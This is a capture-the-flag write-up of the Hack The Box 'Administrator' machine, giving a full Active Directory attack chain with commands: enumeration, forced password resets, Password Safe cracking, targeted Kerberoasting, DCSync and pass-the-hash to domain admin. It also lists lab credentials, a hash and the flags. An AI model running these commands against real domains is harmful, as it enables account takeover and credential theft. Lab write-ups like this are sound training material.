Owned Administrator from Hack The Box!
I have just owned machine Administrator from Hack The Box
Nmap Results
# Nmap 7.94SVN scan initiated Tue Nov 19 11:36:32 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.133.9
Nmap scan report for 10.129.133.9
Host is up (0.089s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 23:37:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
50942/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
50947/tcp open msrpc Microsoft Windows RPC
50950/tcp open msrpc Microsoft Windows RPC
50967/tcp open msrpc Microsoft Windows RPC
56722/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2024-11-19T23:38:07
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 19 11:38:16 2024 -- 1 IP address (1 host up) scanned in 103.96 seconds💡
Don't miss an opportunity to find some breadcrumbs in the initial
nmap output. We can see the DC hostname in the SMB script results, as well as the administrator.htb domain name in the LDAP output. Now would be a good time to add those hostnames to your /etc/hosts file.echo -e '10.129.133.9\t\tDC.administrator.htb administrator.htb' | sudo tee -a /etc/hostsService Enumeration
ℹ️
This target is a bit unconventional for HackThebox in that we start the challenge with credentials, so assumed breach. Being an Active Directory Domain Controller, and having a set of credentials, presents some early opportunities to enumerate a good deal about the domain.
TCP/445
smbclient -U 'administrator.htb/Olivia%ichliebedich' -L //DC.administrator.htb
ADMIN$ or C$ shares.TCP/21
Olivia:ichliebedich do not appear to be valid credentials for the FTP service
TCP/88
impacket-GetADUsers -all 'administrator.htb/Olivia:ichliebedich'cat << EOF | grep -E '2024|never' | cut -d ' ' -f 1 > users.txt
Administrator 2024-10-22 14:59:36.285281 2024-11-19 18:34:44.183103
Guest <never> <never>
krbtgt 2024-10-04 15:53:28.687272 <never>
olivia 2024-10-05 21:22:48.769574 2024-11-19 18:56:38.542617
michael 2024-10-05 21:33:37.049043 <never>
benjamin 2024-10-05 21:34:56.558374 2024-10-05 22:14:53.199541
emily 2024-10-30 19:40:02.775756 2024-10-30 17:23:46.169276
ethan 2024-10-12 16:52:14.117811 <never>
alexander 2024-10-30 20:18:04.165508 <never>
emma 2024-10-30 20:18:35.259255 <never>
EOF
impacket-GetNPUsers -usersfile users.txt -no-pass administrator.htb/
impacket-GetUserSPNs 'administrator.htb/olivia:ichliebedich' -request
TCP/389
LdapDomainDump
ldapdomaindump -u 'administrator.htb\Olivia' -p 'ichliebedich' -o ldd ldap://DC.administrator.htb
open ldd/domain_users_by_group.html
Remote Management Users group can WinRM into the box. We can also see that our current user, Olivia Johnson is in the group and has the PASSWD_NOTREQD flag set.Bloodhound
faketime "$(ntpdate -q DC.administrator.htb | cut -d ' ' -f 1,2)" bloodhound-python -c All -u 'olivia' -p 'ichliebedich' -d 'administrator.htb' -ns 10.129.133.9
sudo neo4j console &Start Bloodhound database
sudo bloodhound &Start bloodhound GUI
Exploit
WinRM as Olivia
evil-winrm -i DC.administrator.htb -u 'olivia' -p 'ichliebedich'
Post-Exploit Enumeration
Operating Environment
Current User
User Name SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Users and Groups
See ldapdomaindump output
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.133.9
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Privilege Escalation
Lateral to Michael
net user Michael 'NewPassword1!' /domain
GenericAll DACLas
evil-winrm as MichaelLateral to Benjamin
Change Benjamin's Password
$targetUser = 'benjamin'
$benjaminNewPassword = ConvertTo-SecureString -AsPlainText -Force 'NewPassword1!'
$michaelPass = ConvertTo-SecureString -AsPlainText -Force 'NewPassword1!'
$michaelCreds = [PSCredential]::new("administrator.htb\michael", $michaelPass)
Set-ADAccountPassword -Identity $targetUser -NewPassword $benjaminNewPassword -Credential $michaelCreds -Reset -Confirm:$false
Which Share?
💡
Initially puzzled, I thought about what else could be considered a file share and tried FTP
ftp> binary
ftp> get Backup.psafe3
Password Safe - Quickstart Guide
Using the Google search operator intext:psafe3, I found that this file type is associated with this program
Cracking the Password Safe
pwsafe2john parser generate a hash for cracking the password to open the password vaultpwsafe2john Backup.psafe3 > hashjohn --wordlist=rockyou.txt hash
Backu:tekieromuchoPassword Safe - Browse /Linux at SourceForge.net
Popular easy-to-use and secure password manager
We can download the latest pwsafe client for Linux from here
Lateral to Emily
evil-winrm -i 'DC.administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
evil-winrm as EmilyGenericWrite on Ethan
ℹ️
I initially tried abusing the
GenericWrite DACL by adding a X.509 certificate (shadow credential) to Ethan's user object in Active Directory. I was able to add the certificate, but the KDC refused to authenticate with the error: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type). So, I went with the forced Kerberoasting option instead.Now that we have a session as Emily, we can abuse the GenericWrite DACL on Ethan's Active Directory user object and set / change the ServicePrincipalName attribute. With a SPN set, we can request a TGS, as Ethan is now treated like a service account. Then, we can derive Ethan's password hash from the TGS.
Get-ADObject -Filter 'samAccountName -like "ethan"' | Set-ADObject -Add @{ServicePrincipalName='pwn/pwn'}
Get-ADObject -Filter 'samAccountName -like "ethan"' -Property ServicePrincipalName
ServicePrincipalName property and verify the changesfaketime "$(ntpdate -q DC.administrator.htb | cut -d ' ' -f 1,2)" impacket-GetUserSPNs 'administrator.htb/olivia:ichliebedich' -dc-ip 10.129.133.9 -request
john --wordlist=~/Pentest/WordLists/rockyou.txt hash
Ethan:limpbizkitLateral to Ethan
Now that we are in possession of Ethan's password, we can authenticate and perform a DCSync attack with Impacket.
impacket-secretsdump -outputfile 'dcsync' -dc-ip 10.129.133.9 'administrator.htb/ethan:limpbizkit@DC.administrator.htb'
Becoming Domain Admin
Finally, we can use a pass-the-hash attack to authenticate to the domain controller as the domain administrator.
evil-winrm -i 'DC.administrator.htb' -u 'Administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
Flags
User
0798cac7f876546fc18403265ad8be7as
Root
7e174606791ca784dd1c32ec228cef26
